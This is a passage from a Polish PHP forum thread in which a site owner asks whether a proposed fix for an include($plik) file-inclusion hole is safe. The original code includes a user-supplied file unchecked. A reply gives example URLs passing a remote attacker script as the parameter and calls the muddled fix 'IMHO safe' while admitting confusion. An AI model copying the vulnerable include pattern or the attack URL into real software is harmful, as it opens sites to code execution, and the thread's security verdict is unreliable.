Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> zabezpieczenia
madalena
post
Post #1





Grupa: Zarejestrowani
Postów: 24
Pomógł: 0
Dołączył: 14.10.2003

Ostrzeżenie: (0%)
-----


Ostatnio dużo czytałem o zabezpieczeniech danych przesyłanych drogą post i get
Nawet w prowadzonym przez mnie serwisie stosując stare techniki ktoś odczytał plik d.php gdzie przechowywane sa hasła

i zaproponował mi zmainą poniższego kodu na następujący

[php:1:38b804c758]<?php
if ((!isset($plik)) || ($plik==""))
{
include("aktualnosci.php");
}
else
{
include($plik);
}
?>[/php:1:38b804c758]

na następujący

[php:1:38b804c758]<?php
$plik = $HTTP_GET_VARS['plik'];
if ($plik||!file_exists($plik))
{
include("aktualnosci.php");
}
else
{
include($plik);
}
?>[/php:1:38b804c758]

Czy to jest poprawne i nie ma zadnego haka

i jak bylo to mozliew ze sprawdzili moje hasła

___
[scanner] Zmoderowane. Prosze używac BBCode
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
CyklOP
post
Post #2





Grupa: Zarejestrowani
Postów: 61
Pomógł: 0
Dołączył: 16.08.2003
Skąd: Wrocław

Ostrzeżenie: (0%)
-----


Cytat
IMHO ten drugi zapis jest bezpieczny.
Natomiast w pierwszym jest include, który nie sprawdza gdzie dany skrypt się znajduje, przez co można otworzyć skrypty z innych serwerów np:
http://twoja.strona.pl/?plik=http://forum....hp.pl/index.php
Oczywiście zamiast index.php można dać inny skrypt, który może zrobić to co chce jego autor.


Nie jestem pewien czy to o to chodzi, ale chyba powyzszy post to dobrze wyjasnia (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Tak wiec hasla wydobyl wpisujac: http://twoja.strona.pl/?cel=http://jegostr...rzanyskrypt.php

Tak wiec teoretycznie php wysyla juz przerobiony kod... z tym ze wykonuje z podana sciezka... dlatego np. gdy mamy 2 pliki:
katalog/wyswietl.php
[php:1:7062864d12]<?php

include("mama.php");

?>[/php:1:7062864d12]
(plik mama.php tez jest w katalogu "katalog/")
i uruchomimy plik: index.php (bedacy w glownym katalogu) zawierajacy:

[php:1:7062864d12]<?php
include("katalog/wyswietl.php");
?>[/php:1:7062864d12]

to zamiast po wejsciu na plik index.php wyswietlic mama.php wyswietli nam blad... (zastanowcie sie chwilke to zrozumiecie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) )

Moze to troche topornie wytlumaczone, ale po prostu w ten sposob gdy zaincludujemy plik spoza naszego serwera to umozliwiamy skryptowi z tamtego serwera dostanie sie do naszych zmiennych (zreszta sam juz nie wiem, sam sobie wszystko pomieszalem (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) zalezy od budowy twego skryptu... jest to luka w bezpieczenstwie i tyle)
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 8.10.2025 - 16:12